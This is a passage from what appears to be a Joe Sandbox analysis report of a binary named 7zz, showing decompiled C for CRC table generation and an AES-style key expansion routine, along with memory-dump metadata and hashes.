^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((( !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ ( !0x00000000 << 0x00000020 |  !((_t114 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ (0 << 0x00000020 | _t114) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1) >> 0x1;
					asm("adc esi, 0xffffffff");
					_t64 = ( !0x00000000 << 0x00000020 | _t63) >> 1;
					 *(0x495a20 + _t114 * 8) =  !((_t63 & 0x00000001) + 0xffffffff) & 0xd7870f42 ^ _t64;
					 *((intOrPtr*)(0x495a24 + _t114 * 8)) = 0x928828;
					_t114 = _t114 + 1;
				} while (_t114 < 0x100);
				return _t64;
			}






                                                                                  0x00467e82
                                                                                  0x00467e84
                                                                                  0x00467e90
                                                                                  0x00467eb8
                                                                                  0x00467edf
                                                                                  0x00467f05
                                                                                  0x00467f2c
                                                                                  0x00467f52
                                                                                  0x00467f79
                                                                                  0x00467f87
                                                                                  0x00467f9f
                                                                                  0x00467fa2
                                                                                  0x00467fbc
                                                                                  0x00467fc3
                                                                                  0x00467fca
                                                                                  0x00467fcb
                                                                                  0x00467fd9

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 23c8aaa3664de804fa2ce29b316b560c6082957a249a83d654323075b2432b7d
                                                                                  • Instruction ID: 58285889abc0c4558893f753c2962dba04340085c6fb08ee3641d5c85bffa47e
                                                                                  • Opcode Fuzzy Hash: 23c8aaa3664de804fa2ce29b316b560c6082957a249a83d654323075b2432b7d
                                                                                  • Instruction Fuzzy Hash: 92318C7BE75C3402E388883ACC233A7504397D5734B6ED3797C76EA2D9EDAD98810194
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046A2A0 Relevance: .1, Instructions: 95COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0046A2A0(signed int* __edx) {
				signed int _t35;
				signed int _t37;
				signed int _t38;
				signed int* _t39;
				signed int* _t40;
				unsigned int _t47;
				signed int _t48;
				signed int* _t49;
				signed int* _t50;
				signed int _t54;
				signed int _t77;
				signed int _t85;
				unsigned int _t86;
				void* _t94;

				_t50 = __edx;
				_t47 =  *(_t94 + 0xc);
				_t86 = _t47 + 0x1c;
				_t48 = _t47 >> 2;
				_t35 = (_t48 >> 1) + 3;
				_t85 = 0;
				 *(_t94 + 0xc) = _t86;
				 *_t49 = _t35;
				if(_t48 == 0) {
					L2:
					if(_t85 >= _t86) {
						return _t35;
					}
					 *((intOrPtr*)(_t94 + 0x14)) = _t49 + 0x10 + (_t85 - _t48) * 4;
					do {
						_t37 = _t85;
						_t38 = _t37 / _t48;
						_t54 = _t37 % _t48;
						_t77 =  *(_t49 + 0xc + _t85 * 4);
						if(_t54 != 0) {
							if(_t48 > 6 && _t54 == 4) {
								_t77 =  *((_t77 & 0x000000ff) + 0x48dc78) & 0x000000ff | (( *((_t77 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t77 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t77 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008;
							}
						} else {
							_t18 = _t38 + 0x48dd78; // 0x8040201
							_t86 =  *(_t94 + 0x10);
							_t77 =  *((_t77 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff ^  *_t18 & 0x000000ff | ((( *((_t77 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t77 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t77 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008;
						}
						_t39 =  *(_t94 + 0x18);
						 *(_t49 + 0x10 + _t85 * 4) =  *_t39 ^ _t77;
						_t85 = _t85 + 1;
						_t40 =  &(_t39[1]);
						 *(_t94 + 0x18) = _t40;
					} while (_t85 < _t86);
					return _t40;
				} else {
					goto L1;
				}
				do {
					L1:
					_t35 =  *_t50;
					 *(_t49 + 0x10 + _t85 * 4) = _t35;
					_t85 = _t85 + 1;
					_t50 =  &(_t50[1]);
				} while (_t85 < _t48);
				goto L2;
			}

















                                                                                  0x0046a2a0
                                                                                  0x0046a2a2
                                                                                  0x0046a2a7
                                                                                  0x0046a2aa
                                                                                  0x0046a2b2
                                                                                  0x0046a2b5
                                                                                  0x0046a2b7
                                                                                  0x0046a2bb
                                                                                  0x0046a2bf
                                                                                  0x0046a2cf
                                                                                  0x0046a2d1
                                                                                  0x0046a3c4
                                                                                  0x0046a3c4
                                                                                  0x0046a2df
                                                                                  0x0046a2e4
                                                                                  0x0046a2e6
                                                                                  0x0046a2e8
                                                                                  0x0046a2e8
                                                                                  0x0046a2ea
                                                                                  0x0046a2f0
                                                                                  0x0046a350
                                                                                  0x0046a3a1
                                                                                  0x0046a3a1
                                                                                  0x0046a2f2
                                                                                  0x0046a2f2
                                                                                  0x0046a340
                                                                                  0x0046a349
                                                                                  0x0046a349
                                                                                  0x0046a3a3
                                                                                  0x0046a3ab
                                                                                  0x0046a3af
                                                                                  0x0046a3b0
                                                                                  0x0046a3b3
                                                                                  0x0046a3b7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046a2c1
                                                                                  0x0046a2c1
                                                                                  0x0046a2c1
                                                                                  0x0046a2c3
                                                                                  0x0046a2c7
                                                                                  0x0046a2c8
                                                                                  0x0046a2cb
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d9ad90c045aee2e314f446bae37fd2ae8d495a05db838e50cc6b87b586cac8e5
                                                                                  • Instruction ID: 55640d85d086321eab8c1dde6dfc87ccde0e417aff073f041b781c99bee8189f
                                                                                  • Opcode Fuzzy Hash: d9ad90c045aee2e314f446bae37fd2ae8d495a05db838e50cc6b87b586cac8e5
                                                                                  • Instruction Fuzzy Hash: 86314DB1E046B606F3109E3F8C4012AB7D3AFC2211F18C6BAE5954B78AEA359592C756
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00459E70 Relevance: .1, Instructions: 74COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E00459E70(void* __ecx) {
				signed int _t35;
				signed int _t36;
				void* _t37;
				unsigned int _t67;
				signed int* _t68;

				_t37 = __ecx;
				_t67 = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0x20;
				 *((intOrPtr*)(__ecx + 0x54)) = 1;
				 *((intOrPtr*)(__ecx + 0x48)) = 4;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				_t8 = _t37 + 0x70; // 0x80
				_t68 = _t8;
				do {
					_t35 =  !((( !((( !((( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t67 & 0x00000001) - 1) & 0xedb88320 ^ _t67 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
					_t36 = _t35 >> 1;
					 *_t68 =  !((_t35 & 0x00000001) - 1) & 0xedb88320 ^ _t36;
					_t67 = _t67 + 1;
					_t68 =  &(_t68[1]);
				} while (_t67 < 0x100);
				return _t36;
			}








                                                                                  0x00459e70
                                                                                  0x00459e70
                                                                                  0x00459e73
                                                                                  0x00459e76
                                                                                  0x00459e79
                                                                                  0x00459e7c
                                                                                  0x00459e83
                                                                                  0x00459e8a
                                                                                  0x00459e91
                                                                                  0x00459e94
                                                                                  0x00459e94
                                                                                  0x00459e97
                                                                                  0x00459f11
                                                                                  0x00459f21
                                                                                  0x00459f25
                                                                                  0x00459f27
                                                                                  0x00459f28
                                                                                  0x00459f2b
                                                                                  0x00459f38

                                                                                  Memory Dump Source
